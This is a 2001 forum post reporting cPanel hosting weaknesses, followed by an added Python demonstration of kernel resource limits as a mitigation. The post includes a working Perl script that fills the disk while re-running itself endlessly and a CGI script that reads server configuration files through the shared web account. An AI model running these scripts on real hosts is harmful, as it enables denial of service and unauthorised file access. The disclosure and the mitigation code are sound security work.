The Community Forums


BUGS CPANEL

Discussion in 'General Discussion' started by 70809, Oct 2, 2001.

  1. 70809

    1. It is necessary to introduce a restriction on the maximum size of a file,
    so that a user cannot create/upload a single file larger than 100 MB.

    I will explain:

    If such a script is started, within a few minutes the server will simply decay:


    #!/usr/bin/perl
    # Appends to ./tmp in an endless loop and re-runs itself on every pass,
    # so disk usage and the number of processes grow without bound.
    while (true)
    {
    open(tmpfile, ">>tmp");
    print tmpfile "hack"x2000;
    close(tmpfile);
    `perl xexexe.pl`
    }

    2. It is necessary to start a SEPARATE COPY of APACHE for each user.
    Now any user has the rights of NOBODY. It IS PARADISE FOR hackers! :)

    Thanks to such scripts, any user can see (view) any file on a server where CPANEL is installed:

    #!/usr/local/bin/perl

    use strict;
    use CGI qw(:standard);
    use CGI::Carp qw(fatalsToBrowser);
    my $cgi = new CGI;
    print $cgi->header('text/html');
    # Slurp mode: read the whole file in one go.
    $/ = undef;
    # The CGI runs with the shared web server account, so this open succeeds.
    open(ff, "< /etc/httpd/conf/httpd.conf") or die "$!";
    my $var = <ff>;
    close(ff);
    print $var;
    #opendir(DIR, "/home") || die "can't opendir: $!";
    #my @dots = grep {-d "/home/$_" } readdir(DIR);
    #closedir DIR;

    #print "$_\n" for @dots;

    #open(FILE, "> ../****.txt") or die "$!";
    #print FILE $var;
    #close(FILE);

    3. It IS NECESSARY TO INTRODUCE LIMITS FOR USERS!
    There should be a restriction on the maximum volume of accepted mail.
    There should be a restriction on the maximum load a user can put on the server's processor.

    Without these things, any programmer can easily break open any server on which CPANEL stands.

    I can demonstrate the breaking of a server free of charge :))

    4. It is necessary to take ALL traffic into account.

    Now only HTTP traffic is taken into account; email and FTP are not taken into account.

    It is silly.

    PS. I apologize for my bad English, as I still know it very badly.
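
Added example, not part of the original post: points 1 and 3 ask for per-user caps on file size and CPU use, and on Linux both exist as kernel resource limits (`RLIMIT_FSIZE`, `RLIMIT_CPU`). The Python code below starts a child process under such caps and shows where an endlessly appending job and a busy loop are stopped; the limit values and helper names are assumptions chosen for the demonstration, not cPanel settings.

```python
import os
import resource
import subprocess
import sys
import tempfile

# Assumed demo values, not cPanel defaults.
MAX_FILE_BYTES = 64 * 1024   # RLIMIT_FSIZE: largest file the job may write
MAX_CPU_SECONDS = 1          # RLIMIT_CPU: CPU time before the kernel stops the job

def _apply_limits():
    # Runs in the child after fork and before exec, so only the job is capped.
    resource.setrlimit(resource.RLIMIT_FSIZE, (MAX_FILE_BYTES, MAX_FILE_BYTES))
    resource.setrlimit(resource.RLIMIT_CPU, (MAX_CPU_SECONDS, MAX_CPU_SECONDS))

def run_limited(argv, cwd=None):
    """Run argv under the caps; return its exit status (negative = signal)."""
    done = subprocess.run(argv, cwd=cwd, preexec_fn=_apply_limits,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                          timeout=30)
    return done.returncode

# Constructed stand-in for a job that appends to ./tmp without end.
APPEND_FOREVER = (
    "f = open('tmp', 'ab', buffering=0)\n"
    "while True:\n"
    "    f.write(b'x' * 8000)\n"
)

def demo_file_cap():
    """Return (exit status, final size of ./tmp) for the appending job."""
    with tempfile.TemporaryDirectory() as workdir:
        status = run_limited([sys.executable, "-c", APPEND_FOREVER], cwd=workdir)
        return status, os.path.getsize(os.path.join(workdir, "tmp"))

def demo_cpu_cap():
    """Return the exit status of a busy loop that never yields the CPU."""
    return run_limited([sys.executable, "-c", "while True: pass"])

if __name__ == "__main__":
    status, size = demo_file_cap()
    print(f"file job: status={status}, ./tmp stopped at {size} bytes")
    print(f"cpu job: status={demo_cpu_cap()} (negative means killed by a signal)")
```

`RLIMIT_NPROC` would bound the self-respawning part of the first script, but it is counted per user ID and is not enforced for privileged processes, so it is left out of this demonstration.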
     